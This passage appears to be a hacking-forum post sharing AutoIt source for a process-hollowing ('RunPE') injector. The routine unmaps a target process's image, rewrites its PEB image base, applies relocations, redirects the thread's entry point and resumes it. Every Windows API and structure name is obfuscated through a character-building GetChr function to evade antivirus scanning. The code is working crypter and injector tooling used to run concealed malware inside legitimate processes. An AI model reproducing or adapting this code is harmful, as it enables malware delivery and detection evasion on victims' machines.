Local $tPEBl6var5 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(71) & GetChr(100) & GetChr(105) & GetChr(83) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(101) & GetChr(100) & GetChr(72) & GetChr(97) & GetChr(110) & GetChr(100) & GetChr(108) & GetChr(101) & GetChr(84) & GetChr(97) & GetChr(98) & GetChr(108) & GetChr(101) & GetChr(59)
Local $tPEBl6var6 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(114) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(72) & GetChr(101) & GetChr(108) & GetChr(112) & GetChr(101) & GetChr(114) & GetChr(59)
Local $tPEBl6var7 = $1 & $tPEBl6var1 & $1
Local $tPEBl6var8 = $tPEBl6var7 & $tPEBl6var2 & $1 & $tPEBl6var3
Local $tPEBl6var9 = $tPEBl6var4 & $tPEBl6var5 & $tPEBl6var6
Local $tPEBl6var10 = $tPEBl6var8 & $tPEBl6var9
Local $tPEBl6 = $tPEBl6var10
Local $tPEBl7var1 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(71) & GetChr(100) & GetChr(105) & GetChr(68) & GetChr(67) & GetChr(65) & GetChr(116) & GetChr(116) & GetChr(114) & GetChr(105) & GetChr(98) & GetChr(117) & GetChr(116) & GetChr(101) & GetChr(76) & GetChr(105) & GetChr(115) & GetChr(116)
Local $tPEBl7var2 = GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(76) & GetChr(111) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(76) & GetChr(111) & GetChr(99) & GetChr(107) & GetChr(59)
Local $tPEBl7var3 = GetChr(32) & GetChr(79) & GetChr(83) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
Local $tPEBl7var4 = GetChr(32) & GetChr(79) & GetChr(83) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
Local $tPEBl7var5 = GetChr(32) & GetChr(79) & GetChr(83) & GetChr(66) & GetChr(117) & GetChr(105) & GetChr(108) & GetChr(100) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(59)
Local $tPEBl7var6 = GetChr(32) & GetChr(79) & GetChr(83) & GetChr(80) & GetChr(108) & GetChr(97) & GetChr(116) & GetChr(102) & GetChr(111) & GetChr(114) & GetChr(109) & GetChr(73) & GetChr(100) & GetChr(59)
Local $tPEBl7var7 = GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(59)
Local $tPEBl7var8 = $tPEBl7var1 & $tPEBl7var2 & $1 & $tPEBl7var3 & $1
Local $tPEBl7var9 = $tPEBl7var4 & $1 & $tPEBl7var5 & $1
Local $tPEBl7 = $tPEBl7var8 & $tPEBl7var9 & $tPEBl7var6 & $1 & $tPEBl7var7
Local $tPEBl8var1 = GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
Local $tPEBl8var2 = GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
Local $tPEBl8var3 = GetChr(32) & GetChr(71) & GetChr(100) & GetChr(105) & GetChr(72) & GetChr(97) & GetChr(110) & GetChr(100) & GetChr(108) & GetChr(101) & GetChr(66) & GetChr(117) & GetChr(102) & GetChr(102) & GetChr(101) & GetChr(114) & GetChr(91) & GetChr(51) & GetChr(52) & GetChr(93) & GetChr(59)
Local $tPEBl8var4 = GetChr(32) & GetChr(80) & GetChr(111) & GetChr(115) & GetChr(116) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(73) & GetChr(110) & GetChr(105) & GetChr(116) & GetChr(82) & GetChr(111) & GetChr(117) & GetChr(116) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(59)
Local $tPEBl8var5 = GetChr(32) & GetChr(84) & GetChr(108) & GetChr(115) & GetChr(69) & GetChr(120) & GetChr(112) & GetChr(97) & GetChr(110) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(109) & GetChr(97) & GetChr(112) & GetChr(59)
Local $tPEBl8var6 = $1 & $tPEBl8var1 & $1 & $tPEBl8var2 & $1
Local $tPEBl8var7 = $tPEBl8var3 & $1 & $tPEBl8var4 & $1
Local $tPEBl8 = $tPEBl8var6 & $tPEBl8var7 & $tPEBl8var5
Local $tPEBl9var1 = GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(84) & GetChr(108) & GetChr(115) & GetChr(69) & GetChr(120) & GetChr(112) & GetChr(97) & GetChr(110) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(109) & GetChr(97) & GetChr(112) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(115) & GetChr(91) & GetChr(49) & GetChr(50) & GetChr(56) & GetChr(93) & GetChr(59)
Local $tPEBl9var2 = GetChr(32) & GetChr(83) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(73) & GetChr(100)
Local $tPEBl9var3 = $tPEBl9var1 & $1 & $tPEBl9var2
Local $tPEBl9 = $tPEBl9var3
Local $tPEB = sv1($tPEBl1 & $tPEBl2 & $tPEBl3 & $tPEBl4 & $tPEBl5 & $tPEBl6 & $tPEBl7 & $tPEBl8 & $tPEBl9)
$5 = sv3($knl, $bo, GetChr(82) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(77) & GetChr(101) & GetChr(109) & GetChr(111) & GetChr(114) & GetChr(121), $p2r, $handle1, $p2r, $peb, $p2r, DllStructGetPtr($tPEB), GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), DllStructGetSize($tPEB), _
		GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(42), 0)
If @error Or Not $5[0] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	Return SetError(8, 0, 0)
EndIf
DllStructSetData($tPEB, GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115), $ZP)
$5 = sv3($knl, $bo, $wpm, $ha, $handle1, $p2r, $peb, $p2r, DllStructGetPtr($tPEB), GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), DllStructGetSize($tPEB), _
		GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(42), 0)
If @error Or Not $5[0] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	Return SetError(9, 0, 0)
EndIf

#Region 9. NEW ENTRY POINT
Switch $flag
	Case 1
		DllStructSetData($context, GetChr(69) & GetChr(97) & GetChr(120), $ZP + $entry)
	Case 2
		DllStructSetData($context, GetChr(82) & GetChr(99) & GetChr(120), $ZP + $entry)
	Case 3
		;nothing
EndSwitch

#Region 10. SET NEW CONTEXT
$5 = sv3($knl, $bo, GetChr(83) & GetChr(101) & GetChr(116) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(120) & GetChr(116), _
		$ha, $handle2, _
		$p2r, DllStructGetPtr($context))
If @error Or Not $5[0] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	Return SetError(10, 0, 0)
EndIf

#Region 11. RESUME THREAD
$5 = sv3($knl, $dw, GetChr(82) & GetChr(101) & GetChr(115) & GetChr(117) & GetChr(109) & GetChr(101) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100), $ha, $handle2)
If @error Or $5[0] = -1 Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	Return SetError(11, 0, 0)
EndIf

#Region 12. CLOSE OPEN HANDLES AND RETURN PID
sv3($knl, $bo, GetChr(67) & GetChr(108) & GetChr(111) & GetChr(115) & GetChr(101) & GetChr(72) & GetChr(97) & GetChr(110) & GetChr(100) & GetChr(108) & GetChr(101), $ha, $handle1)
sv3($knl, $bo, GetChr(67) & GetChr(108) & GetChr(111) & GetChr(115) & GetChr(101) & GetChr(72) & GetChr(97) & GetChr(110) & GetChr(100) & GetChr(108) & GetChr(101), $ha, $handle2)
Return sv2($pi, GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(73) & GetChr(100))
EndFunc   ;==>RunBinary

Func sv1($1, $2 = "r")
If $2 = "r" Then
	$ret = DllStructCreate($1)
Else
	$ret = DllStructCreate($1, $2)
EndIf
Return $ret
EndFunc   ;==>sv1

Func sv3($1, $2, $3, $4 = "r", $5 = "r", $6 = "r", $7 = "r", $8 = "r", $9 = "r", $10 = "r", $11 = "r", $12 = "r", $13 = "r", $14 = "r", $15 = "r", $16 = "r", $17 = "r", $18 = "r", $19 = "r", $20 = "r", $21 = "r", $22 = "r", $23 = "r", $24 = "r")
If $4 = "r" Then
	$ret = DllCall($1, $2, $3)
ElseIf $6 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5)
ElseIf $8 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7)
ElseIf $10 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9)
ElseIf $12 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11)
ElseIf $14 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13)
ElseIf $16 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15)
ElseIf $18 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17)
ElseIf $20 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19)
ElseIf $22 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19, $20, $21)
ElseIf $24 = "r" Then
	$ret = DllCall($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19, $20, $21, $22, $23)
EndIf
Return $ret
EndFunc   ;==>sv3

Func sv2($1, $2, $3 = "r")
If $3 = "r" Then
	$ret = DllStructGetData($1, $2)
Else
	$ret = DllStructGetData($1, $2, $3)
EndIf
Return $ret
EndFunc   ;==>sv2

Func sv5($h1, $iSize)
Local $5 = sv3($knl, $p2r, $vex, $ha, $h1, $p2r, 0, GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), $iSize, $dw, 0x3000, $dw, 64)
If @error Or Not $5[0] Then Return SetError(1, 0, 0)
Return $5[0]
EndFunc   ;==>sv5

Func sv6($h1, $p1, $iSize)
Local $5 = sv3($knl, $p2r, $vex, $ha, $h1, $p2r, $p1, GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), $iSize, $dw, 0x1000, $dw, 64)
If @error Or Not $5[0] Then
	$5 = sv3($knl, $p2r, $vex, $ha, $h1, $p2r, $p1, GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), $iSize, $dw, 0x3000, $dw, 64)
	If @error Or Not $5[0] Then Return SetError(1, 0, 0)
EndIf
Return $5[0]
EndFunc   ;==>sv6

Func sv7($h1, $p1)
sv3(GetChr(110) & GetChr(116) & GetChr(100) & GetChr(108) & GetChr(108) & GetChr(46) & GetChr(100) & GetChr(108) & GetChr(108), GetChr(105) & GetChr(110) & GetChr(116), GetChr(78) & GetChr(116) & GetChr(85) & GetChr(110) & GetChr(109) & GetChr(97) & GetChr(112) & GetChr(86) & GetChr(105) & GetChr(101) & GetChr(119) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110), $p2r, $h1, $p2r, $p1)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc   ;==>sv7

Func sv8($pMod, $tData, $p1New, $p1Old, $fimg)
Local $iDelta = $p1New - $p1Old
Local $iSize = DllStructGetSize($tData)
Local $pData = DllStructGetPtr($tData)
Local $tIBR, $iRelativeMove
Local $iVA, $iSizeofBlock, $iNumberOfEntries
Local $tEnries, $iData, $tAddress
Local $iFlag = 3 + 7 * $fimg
While $iRelativeMove < $iSize
	$tIBR = sv1(GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(66) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(107), $pData + $iRelativeMove)
	$iVA = sv2($tIBR, GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115))
	$iSizeofBlock = sv2($tIBR, GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(66) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(107))
	$iNumberOfEntries = ($iSizeofBlock - 8) / 2
	$tEnries = sv1(GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(91) & $iNumberOfEntries & GetChr(93), DllStructGetPtr($tIBR) + 8)
	For $i = 1 To $iNumberOfEntries
		$iData = sv2($tEnries, 1, $i)
		If BitShift($iData, 12) = $iFlag Then
			$tAddress = sv1($p2r, $pMod + $iVA + BitAND($iData, 0xFFF))
			DllStructSetData($tAddress, 1, sv2($tAddress, 1) + $iDelta)
		EndIf
	Next
	$iRelativeMove += $iSizeofBlock
WEnd
Return 1
EndFunc   ;==>sv8

Func GetChr($NumInput)
$NumInput = $NumInput - 10
$NumInput = $NumInput - 10
$NumInput = $NumInput + 20
$NumInput = $NumInput - 15
$NumInput = $NumInput - 5
$NumInput = $NumInput - 20
$NumInput = $NumInput - 4
$NumInput = $NumInput * 1
$NumInput = $NumInput + 40
$OutPutNum = $NumInput + 4
$OutPutChr = Chr($OutPutNum)
Return $OutPutChr
EndFunc   ;==>GetChr
[/HIDE-THANKS]

 
Status
Not open for further replies.
Back
Top